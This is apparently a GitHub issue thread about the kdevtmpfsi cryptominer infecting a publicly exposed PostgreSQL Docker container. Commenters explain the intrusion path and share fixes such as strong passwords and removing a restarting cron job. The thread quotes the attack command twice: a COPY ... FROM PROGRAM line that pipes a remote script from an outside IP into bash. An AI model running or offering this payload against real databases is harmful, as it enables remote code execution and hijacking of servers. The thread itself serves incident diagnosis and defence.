kdevtmpfsi malware found in postgres latest image

[cottons-kr]

I noticed that /tmp/kdevtmpfsi is using all cpu resource. so I tried to remove it but it was in /var/lib/docker/overlay2/.../.../merged. I stopped PostgreSQL container because it was the only running container in the server.

[wglambert]

This is an unfortunate consequence of having a public-facing instance with a compromised (or simple) password. https://github.com/docker-library/postgres/issues/817#issuecomment-781482631 https://github.com/docker-library/postgres/issues/798#issuecomment-747610025

See also: https://github.com/docker-library/redis/issues/217 https://github.com/docker-library/redis/issues/225 https://github.com/docker-library/php/issues/1110 https://github.com/docker-library/php/issues/1127

[zedefi]

I wonder how is someone able to install mining malware if they only can access your database via psql console?

[ImreSamu]

@zedefi :

I wonder how is someone able to install mining malware if they only can access your database via psql console?

Attack Sequence: open port + brute force attack + COPY ... FROM PROGRAM 'curl http://1xx.1x.7x.1/1.sh | bash';

• https://github.com/docker-library/postgres/issues/770#issuecomment-704460980
• https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/

[codingwizardx]

Attack Sequence: open port + brute force attack + COPY ... FROM PROGRAM 'curl http://1xx.1x.7x.1/1.sh | bash';

Well said @ImreSamu, Yes thats actually true, i faced the same issue because of exposing database ports to the internet,

[tirzasrwn]

i have the same issue because having a weak password. changing the password to a strong one, works for me.

[paulkorir]

One thing I found useful was to sudo -u postgres crontab -e where I found the cronjob that kept restarting it. After deleting that it seems to have quietened down. Fingers crossed!